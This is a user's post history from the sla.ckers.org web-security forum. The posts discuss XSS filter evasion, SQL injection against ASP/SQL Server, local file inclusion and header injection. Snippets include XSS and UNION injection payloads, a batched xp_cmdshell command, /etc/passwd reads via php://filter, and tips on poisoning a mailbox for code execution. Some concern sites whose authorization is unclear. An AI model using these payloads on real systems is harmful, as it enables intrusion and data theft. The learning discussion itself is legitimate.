Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Current Page: 1 of 1
Results 1 - 23 of 23
2 years ago
rickm
Hi Gareth Heyes Thanks for your answer, very appreciated. However I was unable to find an alternative for double_uri and malformed_uri on the new interface. Can you point me it out please? Also, do you have any kind of detailed documentation of the new interface? Or can you please consider videos illustrating the features? :) Thanks
Forum: Obfuscation
2 years ago
rickm
Hi all I was reading about Hackvector and I found this nice video (http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/) where they used it to encode the XSS payload with nibbles, however, I was unable to find similar feature on the current version (https://hackvertor.co.uk/public). Is it still possible? Can someone please point me to an video showing similar technique wit
Forum: Obfuscation
2 years ago
rickm
Hi Albino Thanks for your answer, very appreciated. I will take a closer look at this book that you are referencing. This http://html5sec.org/ is nice. The other site (http://shazzer.co.uk/vectors) provides a lot of examples, but most of them do not looks that exotic like the ones that I referenced. IF you know other sites with a list of exotic XSS, please, let me know. Thanks.
Forum: XSS Info
2 years ago
rickm
Hi all I'm dedicated in learn XSS, I understand the basic and I'm learning everyday more and more - thanks to this great forum and all you guys. Most of my tests are with FireFox 16.0.2 and this vulnerable test site (it's a site created intentionally to be vulnerable and test web issues): http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script> However, if y
Forum: XSS Info
2 years ago
rickm
Hi I'm studying XSS and I'm learning a lot here, you are very good with it. I noticied that many XSS payloads are dependent of specific browsers, however, I tested some of the payloads that you provided for generic browser and they do not work here. I'm using Firefox and I tested it against the IBM WatchFire that is contructed to be vulnerable. For example, this basic XSS input works as e
Forum: Obfuscation
2 years ago
rickm
Hi Vaibs Thanks for share. I'm learning XSS and I loved your website, however I was unable to reproduce many of your payloads to bypass WAF. I'm using Firefox and I tested it against the IBM WatchFire that is contructed to be vulnerable. For example, this basic XSS input works as expected: http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script> However all
Forum: Obfuscation
4 years ago
rickm
Thanks for explanation SeriousBeige.
Forum: SQL and Code Injection
4 years ago
rickm
The length and the == on the end looks like base64, but the output is weird.
Forum: SQL and Code Injection
4 years ago
rickm
But PHP files are plain-text, so why you need to encode it to base64? Humm... have you tried /proc/self/ technique? http://www.0x50sec.org/how-to-exploit-local-file-inclusion-vulnerability/ Let me know if it works.
Forum: SQL and Code Injection
4 years ago
rickm
Since I can generate delays calling xp_cmdshell with ping, there is a way to use it as a timing? For example, do a select and if the comparison of the first char of the username is like s I will execute the xp_cmdshell, else it's not executed? Any ideas?
Forum: SQL and Code Injection
4 years ago
rickm
Humm...but in general what is the benefit of use php://filter/resource=/etc/passwd%00 instead of just =/etc/passwd%00? The host has a local SMTP server? If yes, you can deliver a SMTP message with PHP code on the body and load directory the mailbox of apache / www-date user.
Forum: SQL and Code Injection
4 years ago
rickm
and you found a way to avoid the ":" ? Well, if you can load local files directly, why you need php://filter/resource=?
Forum: SQL and Code Injection
4 years ago
rickm
The most weird, is that if I inject batched query: script.aspx?id=124&iid=1'; exec master..xp_cmdshell "ping 10.1.1.3" -- I see the page taking like 7 seconds to answer to me, while on the other queries it's very fast. So I believe it's happening because it's executing ping in a host that doesn't exist and consequently it's generating a timeout. However, every try that I
Forum: SQL and Code Injection
4 years ago
rickm
Maybe it's the version of PHP? Maybe it doesn't work on new versions like PHP 5.X? Just for curious, why you need it to ready passwd? I don't understand, since passwd is plain-text and also us this php filter is useless to bypass IDS. Also, this %00 I don't think that works with last versions of PHP... I may be wrong.
Forum: SQL and Code Injection
4 years ago
rickm
flics, I tried and no lucky. :( No one?
Forum: SQL and Code Injection
4 years ago
rickm
Thanks for answer lightos, and any idea how to exploit iid in a reliable way?
Forum: SQL and Code Injection
4 years ago
rickm
Yo Injectors I'm testing a site and the URL is like this: script.aspx?id=124&iid=1 It's vulnerable to SQL Injection, both parameters. If I inject: script.aspx?id=124&iid="1 I get: - Unclosed quotation mark after the character string '1, @fl_id=124'. Incorrect syntax near '1, @fl_id=124'. If I inject: script.aspx?id=124&iid='1 I get: - Incorrect sy
Forum: SQL and Code Injection
4 years ago
rickm
Hello There is a application developed in asp/.net that was vulnerable to http split attacks. There was a input parameter sent in GET requests that was used as part of the location reader on the redirect. So, we just inserted a CRLF and we could create fake headers. They mitigated the problem, but I'm unsure if it's really a good mitigation. Now, it only prints on the location header unti
Forum: CSRF and Session Info
4 years ago
rickm
Hello Sorry if I posted on the wrong section, but I couldn't find the appropriate. I'm doing a test and I obtained a copy of the web.config file, the interesting is that there is a line like that "<add key="PasswordFile" value="C:\Inetpub\site\Users.acl" />" this called my attention to be on the inetpub folder and I was able to download it. It's wit
Forum: SQL and Code Injection
5 years ago
rickm
Thanks for the answers.
Forum: SQL and Code Injection
5 years ago
rickm
Yo lightos Thanks for your help. I think this SQL Injection is really strange. See... Injecting: lang.asp?=1' order by 1-- Result in: Unclosed quotation mark after the character string ' order by 1--'. I make me think that there is a problem with quotes or double quotes... If I inject: lang.asp?=1%20 order %20 by %20 1-- Result in: Microsoft OLE DB Provider fo
Forum: SQL and Code Injection
5 years ago
rickm
YO lightos Looks like a good suggestion, however I did it and couldn't solve the problem. Can you please translate to me what they mean by "operator must have an equal number of expressions in their target lists"? At first I was thinking it could be different number of columns, but I tried... UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL %20-- UNION%20 ALL%20 S
Forum: SQL and Code Injection
5 years ago
rickm
Yo dudes! I'm trying to exploit a SQL Injection is in a field in ASP with SQL Server - error based SQL Injection. Some informations that may be helpful... UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20int) %20-- Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'CVP' to data type int. /include/lang.asp, line 19
Forum: SQL and Code Injection
Current Page: 1 of 1